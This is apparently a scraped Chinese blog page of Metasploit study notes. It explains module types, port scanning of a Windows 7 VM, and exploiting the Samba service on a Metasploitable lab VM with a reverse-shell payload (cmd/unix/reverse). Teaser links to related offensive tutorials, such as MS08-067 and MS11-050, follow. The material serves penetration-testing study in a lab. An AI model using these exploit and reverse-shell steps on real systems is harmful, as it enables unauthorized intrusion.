1.更新

apt-get update:更新源

apt-get upgrade:更新软件包

apt-get dist-upgrade:升级系统

2. Metasploit基础

2.1专业名词

  1. Auxiliaries(辅助模块) 扫描,嗅探,指纹识别

  2. Exploit(漏洞利用模块) 针对漏洞进行攻击

  3. Payload:目标被渗透之后的完成实际攻击功能的代码如添加一个用户,关机等等

  4. Post(后期渗透模块): 后渗透的一些攻击:获取敏感信息,实现天半攻击等

  5. Encoders:免杀,混淆

2.2 渗透步骤

  • 扫描目标主机,寻找漏洞

  • 选择并配置一个Exploit

  • 选择并配置一个Payload

  • 选择一个Encoders

  • 渗透攻击

3. 主机扫描

  • ip 开放端口,可用服务等

3.1 使用Auxiliary进行端口扫描

  • search portscan 搜索可用的扫描器

  • use 使用该模块,可以输入全名,也可以输入序号(选用tcp扫描器)

  • show options 显示需要设置的参数,required为yes的为必须包含的实际的值

  • RHOSTS:待扫描的ip PORTS:扫描端口范围 THREADS:扫描线程

  • set进行设置参数,unset取消参数的设置

  • 以本地搭建好的一个win7虚拟机为例(ip 192.168.21.131)

  • run或exploit进行扫描

  • 结果:25 110端口显示开放(1-1000)

  • 别的扫描模块待测试,互联网上也有人列举出了一些常用的扫描模块

3.2 使用nmap扫描

  • msf下直接nmap

  • 两次扫描均没什么结果

下面以 Metasploitable 虚拟机演示

安装: https://www.zhaosimeng.cn/ctcs/95.html

ip:192.168.21.132

4.0 漏洞利用

  • 扫描信息 nmap -sV 192.168.21.132

  • 目标主机上存在Samba3.x服务(对其进行攻击)

  • search samba

  • use 13 (13为excellent)

  • show payloads并选用一款Linux下的payload

  • set payload cmd/unix/reverse

  • show options

  • 然后run/exploit(中间虚拟机出现了点问题ip变为192.168.21.133)

  • 如图反弹一个shell

Metasploit学习笔记(一)的更多相关文章

  1. metasploit 学习笔记-VULNERABILITY SCANNING

    使用漏洞扫描器会在网络上产生大量流量,因此如果你不希望被发现踪迹时,不要使用漏洞扫描器。 The Basic Vulnerability Scan 漏洞扫描器的质量很大程度上取决于它自带的漏洞特征库。 ...

  2. Metasploit学习笔记之——情报搜集

    1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):root@kali:~# whois testfire.ne ...

  3. Metasploit学习笔记(博主推荐)

    不多说,直接上干货! 连接后台的数据库,当然不是必须品. 连接数据库的好处:1.可以攻击和扫描的结果,保存起来      2.将一些搜索结果做个缓存 默认数据库是postgresql. 同时要注意的是 ...

  4. Metasploit学习笔记

    原创博客,转载请注出处! 各位看官可参看——Metasploit实验操作 1.打开msf        msfconsole2.帮助选项:    msfconsole -h        显示在msf ...

  5. Metasploit学习笔记(一) Samba服务 usermap_script安全漏洞相关信息

    一.Samba介绍 Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成.SMB是一种在局域网上实现共享文件和打印机的协议.存在一个服务器,客户机通过该协议可以服务 ...

  6. Metasploit学习笔记——强大的Meterpreter

    1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. ...

  7. Metasploit学习笔记——社会工程学

    1.社会工程学攻击案例——伪装木马 Linux命令终端输入命令msfvenom -l payloads用来列出攻击载荷,grep命令用来查询所需要的攻击载荷,条件是windows系统.要有回连至监听主 ...

  8. Metasploit学习笔记——客户端渗透攻击

    1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exp ...

  9. Metasploit学习笔记——网络服务渗透攻击

    1.内存攻防技术 1.1缓冲区溢出漏洞机理 1.2栈溢出利用机理 1.3缓冲区溢出利用的限制条件 2.网络服务渗透攻击面 3. Windows服务渗透攻击实战案例——MS08-067安全漏洞 示例代码 ...

  10. Metasploit学习笔记——Web应用渗透技术

    1.命令注入实例分析 对定V公司网站博客系统扫描可以发现,它们安装了zingiri-web-shop这个含有命令注入漏洞的插件,到www.exploit-db.com搜索,可以看到2011.11.13 ...

随机推荐

  1. MySQL:锁机制和隔离事务级别

    在mysql中的锁看起来是很复杂的,因为有一大堆的东西和名词:排它锁,共享锁,表锁,页锁,间隙锁,意向排它锁,意向共享锁,行锁,读锁,写锁,乐观锁,悲观锁,死锁.这些名词有的博客又直接写锁的英文的简写 ...

  2. python fabric 练习记录

    https://blog.csdn.net/freeking101/article/details/81103945   fabric 域名

  3. background-clip 和 background-origin 有什么区别? -[CSS] - [属性]

    这两个属性在W3S上的示例,给人的感觉好像效果是一样的:

  4. Pyhton基本图形绘制

    目前学习Python中,记录一些内容~ 以下为部分练习内容 1.Python蟒蛇绘制 1 #PythonDraw.py 2 import turtle as t #t作为turtle的别名:另一种方法 ...

  5. 字符串操作 — Google Guava

    前言 Java 里字符串表示字符的不可变序列,创建后就不能更改.在我们日常的工作中,字符串的使用非常频繁,熟练的对其操作可以极大的提升我们的工作效率,今天要介绍的主角是 Google 开源的一个核心 ...

  6. (js描述的)数据结构[队列结构,优先级队列](3)

    (js描述的)数据结构[队列结构](3) 一.队列结构的特点: 1.基于数组来实现,的一种受限的线性结构. 2.只允许在表头进行删除操作,在表尾进行插入操作. 3.先进先出(FIFO) 二.队列的一些 ...

  7. TP的where方法的使用

    1.Thinkphp中where()条件的使用 总是有人觉得,thinkphp的where()就是写我要进行增加.查询.修改.删除数据的条件,很简单的,其实我想告诉你,where()是写条件语句的,但 ...

  8. 8.1 api概述及使用

    api文件:JDK_API_1.6.CHM 1:打开帮助文档2:点击显示,找到索引,看到输入框3:你要学习什么内容,你就在框框里面输入什么内容 举例:Random4:看包 java.lang包下的类在 ...

  9. "字体图标"组件:<icon> —— 快应用组件库H-UI

     <import name="icon" src="../Common/ui/h-ui/basic/c_icon"></import> ...

  10. Loading纯JS

    function showLoading() { document.getElementById("over").style.display = "block" ...